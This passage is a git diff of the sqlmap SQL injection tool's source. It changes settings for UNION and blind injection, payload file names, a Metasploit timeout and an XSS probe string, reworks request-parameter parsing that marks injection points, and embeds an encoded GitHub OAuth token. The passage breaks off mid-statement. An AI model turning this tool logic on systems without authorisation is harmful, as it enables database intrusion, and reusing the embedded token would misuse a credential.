+DUMP_FILE_BUFFER_SIZE = 1024 + # Parse response headers only first couple of times PARSE_HEADERS_LIMIT = 3 # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections ORDER_BY_STEP = 10 -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 +# Maximum number of times for revalidation of a character in inference (as required) +MAX_REVALIDATION_STEPS = 5 # Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' +PARAMETER_SPLITTING_REGEX = r"[,|;]" # Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' +UNION_CHAR_REGEX = r"\A\w+\Z" # Attribute used for storing original parameter value in special cases (e.g. 
POST) -UNENCODED_ORIGINAL_VALUE = 'original' +UNENCODED_ORIGINAL_VALUE = "original" # Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') +COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser") # Default delimiter in GET/POST values DEFAULT_GET_POST_DELIMITER = '&' @@ -483,7 +552,7 @@ DEFAULT_COOKIE_DELIMITER = ';' FORCE_COOKIE_EXPIRATION_TIME = "9999999999" # Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng==" +GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ==" # Skip unforced HashDB flush requests below the threshold number of cached items HASHDB_FLUSH_THRESHOLD = 32 @@ -491,11 +560,14 @@ HASHDB_FLUSH_THRESHOLD = 32 # Number of retries for unsuccessful HashDB flush attempts HASHDB_FLUSH_RETRIES = 3 +# Number of retries for unsuccessful HashDB retrieve attempts +HASHDB_RETRIEVE_RETRIES = 3 + # Number of retries for unsuccessful HashDB end transaction attempts HASHDB_END_TRANSACTION_RETRIES = 3 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10)) +HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))' # Warn user of possible delay due to large page dump in full UNION query injections LARGE_OUTPUT_THRESHOLD = 1024 ** 2 @@ -521,14 +593,26 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters) # Alphabet used for heuristic checks HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') -# String used for dummy XSS check of a tested parameter value -DUMMY_XSS_CHECK_APPENDIX = "<'\">" +# Minor artistic touch +BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER) + +# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value +DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" + +# Regular expression used for recognition of file inclusion errors +FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" + +# Length of prefix and suffix used in non-SQLI heuristic checks +NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. 
large table dump in full UNION injections) MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 # Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 +MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024 + +# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher) +MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024 # Maximum (multi-threaded) length of entry in bisection algorithm MAX_BISECTION_LENGTH = 50 * 1024 * 1024 @@ -537,7 +621,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024 LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" # Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- " +GENERIC_SQL_COMMENT = "-- [RANDSTR]" # Threshold value for turning back on time auto-adjustment mechanism VALID_TIME_CHARS_RUN_THRESHOLD = 100 @@ -546,7 +630,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100 CHECK_ZERO_COLUMNS_THRESHOLD = 10 # Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved") +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA") # Generic www root directory names GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") @@ -558,7 +642,7 @@ MAX_HELP_OPTION_LENGTH = 18 MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal") +FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' @@ -569,8 +653,17 @@ EVENTVALIDATION_REGEX = r'(?i)(?P__EVENTVALIDATION[^"]*)[^>]+value="(?P]+>(.+>)?\s*\Z" @@ -599,6 +692,9 @@ SUHOSIN_MAX_VALUE_LENGTH = 512 # Minimum size of an (binary) entry before it can be considered for dumping to disk MIN_BINARY_DISK_DUMP_SIZE = 100 +# Filenames of payloads xml files (in order of loading) +PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml") + # Regular expression used for extracting form tags FORM_SEARCH_REGEX = r"(?si)" @@ -609,7 +705,7 @@ MAX_HISTORY_LENGTH = 1000 MIN_ENCODED_LEN_CHECK = 5 # Timeout in seconds in which Metasploit remote session has to be initialized -METASPLOIT_SESSION_TIMEOUT = 300 +METASPLOIT_SESSION_TIMEOUT = 120 # Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html LOBLKSIZE = 2048 @@ -630,7 +726,7 @@ BRUTE_DOC_ROOT_PREFIXES = { } # Suffixes used in brute force search for web server document root -BRUTE_DOC_ROOT_SUFFIXES = ("", "html", 
"htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build") +BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build") # String used for marking target name inside used brute force web server document root BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" diff --git a/lib/core/shell.py b/lib/core/shell.py index 1e7f35d50..2d72eeaea 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,22 +1,43 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import atexit import os -import rlcompleter from lib.core import readlineng as readline -from lib.core.common import Backend from lib.core.data import logger from lib.core.data import paths from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import OS from lib.core.settings import MAX_HISTORY_LENGTH +try: + import rlcompleter + + class CompleterNG(rlcompleter.Completer): + def global_matches(self, text): + """ + Compute matches when text is a simple name. + Return a list of all names currently defined in self.namespace + that match. + """ + + matches = [] + n = len(text) + + for ns in (self.namespace,): + for word in ns: + if word[:n] == text: + matches.append(word) + + return matches +except: + readline._readline = None + def readlineAvailable(): """ Check if the readline is available. By default @@ -75,24 +96,6 @@ def loadHistory(completion=None): warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) logger.warn(warnMsg) -class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. 
- """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches - def autoCompletion(completion=None, os=None, commands=None): if not readlineAvailable(): return diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index eee73afdd..5f67fc704 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/target.py b/lib/core/target.py index c1bf921bd..43cbabbf9 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,17 +9,21 @@ import codecs import functools import os import re +import subprocess +import sys import tempfile import time import urlparse from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import intersect from lib.core.common import normalizeUnicode from lib.core.common import openFile from lib.core.common import paramToDict +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import urldecode @@ -34,12 +38,12 @@ from lib.core.dump import dumper from lib.core.enums import HASHDB_KEYS from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS @@ -66,7 +70,6 @@ from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import XML_RECOGNITION_REGEX from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper from thirdparty.odict.odict import OrderedDict def _setRequestParams(): @@ -92,8 +95,8 @@ def _setRequestParams(): # Perform checks on POST parameters if conf.method == HTTPMETHOD.POST and conf.data is None: - errMsg = "HTTP POST method depends on HTTP data value to be posted" - raise SqlmapSyntaxException(errMsg) + logger.warn("detected empty POST body") + conf.data = "" if conf.data is not None: conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method @@ -117,23 +120,26 @@ def _setRequestParams(): if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data: message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR message += "'--data'. Do you want to process it? 
[Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y') + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' if kb.processUserMarks: kb.testOnlyCustom = True - if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): - if re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + if re.search(JSON_RECOGNITION_REGEX, conf.data): + message = "JSON data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y') + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data) @@ -143,52 +149,68 @@ def _setRequestParams(): _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _) _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _) conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) - kb.postHint = POST_HINT.JSON - elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): - message = "JSON-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.JSON + + elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): + message = "JSON-like data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"('(?P[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data) conf.data = re.sub(r"('(?P[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.JSON_LIKE - elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): - message = "Array-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.JSON_LIKE + + elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): + message = "Array-like data found in %s data. " % conf.method + message += "Do you want to process it? 
[Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data) - kb.postHint = POST_HINT.ARRAY_LIKE - elif re.search(XML_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.ARRAY_LIKE + + elif re.search(XML_RECOGNITION_REGEX, conf.data): + message = "SOAP/XML data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML - elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): + kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML + + elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): + message = "Multipart-like data found in %s data. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.MULTIPART + + kb.postHint = POST_HINT.MULTIPART if not kb.postHint: if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed @@ -210,20 +232,20 @@ def _setRequestParams(): if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"): warnMsg = "you've provided target URL without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " + warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" + warnMsg += "through option '--data'" logger.warn(warnMsg) message = "do you want to try URI injections " message += "in the target URL itself? 
[Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] not in ("n", "N"): + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) kb.processUserMarks = True - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" @@ -232,11 +254,12 @@ def _setRequestParams(): lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' if kb.processUserMarks: kb.testOnlyCustom = True @@ -315,39 +338,46 @@ def _setRequestParams(): # Perform checks on header values if conf.httpHeaders: - for httpHeader, headerValue in conf.httpHeaders: + for httpHeader, headerValue in list(conf.httpHeaders): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - httpHeader = httpHeader.title() - - if httpHeader == HTTP_HEADER.USER_AGENT: + if httpHeader.title() == HTTP_HEADER.USER_AGENT: conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) if condition: conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} testableParameters = True - elif httpHeader == HTTP_HEADER.REFERER: + elif httpHeader.title() == HTTP_HEADER.REFERER: conf.parameters[PLACE.REFERER] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) if condition: conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader == HTTP_HEADER.HOST: + elif httpHeader.title() == HTTP_HEADER.HOST: conf.parameters[PLACE.HOST] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) if condition: conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} testableParameters = True + else: + condition = intersect(conf.testParameter, [httpHeader], True) + + if condition: + conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) + conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)} + conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders] + testableParameters = True + if not conf.parameters: errMsg = "you did not provide any GET, POST and Cookie " errMsg += "parameter, neither an User-Agent, Referer 
or Host header value" @@ -359,7 +389,7 @@ def _setRequestParams(): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) @@ -369,9 +399,9 @@ def _setRequestParams(): if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter) message += "Do you want sqlmap to automatically update it in further requests? [y/N] " - test = readInput(message, default="N") - if test and test[0] in ("y", "Y"): - conf.csrfToken = parameter + + if readInput(message, default='N', boolean=True): + conf.csrfToken = getUnicode(parameter) break def _setHashDB(): @@ -399,12 +429,18 @@ def _resumeHashDBValues(): """ kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns + kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars + kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable + kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) + if kb.errorChunkLength and kb.errorChunkLength.isdigit(): + kb.errorChunkLength = int(kb.errorChunkLength) + else: + kb.errorChunkLength = None + conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: @@ -413,7 +449,7 @@ def _resumeHashDBValues(): if not conf.tech or intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) + injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) if injection not in kb.injections: kb.injections.append(injection) @@ -434,7 +470,7 @@ def _resumeDBMS(): dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("%s ([\d\.]+)" % _, dbms, re.I) + _ = re.search(r"\A%s (.*)" % _, dbms, re.I) if _: dbms = _.group(1).lower() @@ -453,9 +489,8 @@ def _resumeDBMS(): message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms message += "Do you really want to force the back-end " message += "DBMS value? 
[y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.dbms = None Backend.setDbms(dbms) Backend.setVersionList(dbmsVersion) @@ -489,9 +524,8 @@ def _resumeOS(): message += "operating system is %s. " % os message += "Do you really want to force the back-end DBMS " message += "OS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.os = os else: conf.os = os @@ -514,7 +548,8 @@ def _setResultsFile(): except (OSError, IOError), ex: try: warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex)) - conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1] + handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv") + os.close(handle) conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename logger.warn(warnMsg) @@ -525,7 +560,7 @@ def _setResultsFile(): errMsg += "create temporary files and/or directories" raise SqlmapSystemException(errMsg) - conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep) + conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep) logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) @@ -574,11 +609,7 @@ def _createDumpDir(): conf.dumpPath = tempDir def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper - + conf.dumper = dumper conf.dumper.setOutputFile() def _createTargetDirs(): @@ -586,28 +617,33 @@ def _createTargetDirs(): Create the output directory. """ - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) + try: + if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): + os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) + + _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr()) + open(_, "w+b").close() + os.remove(_) + + if conf.outputDir: warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) + except (OSError, IOError), ex: + try: + tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") + except Exception, _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) - warnMsg = "unable to create regular output directory " - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the") + warnMsg += "'%s' (%s). 
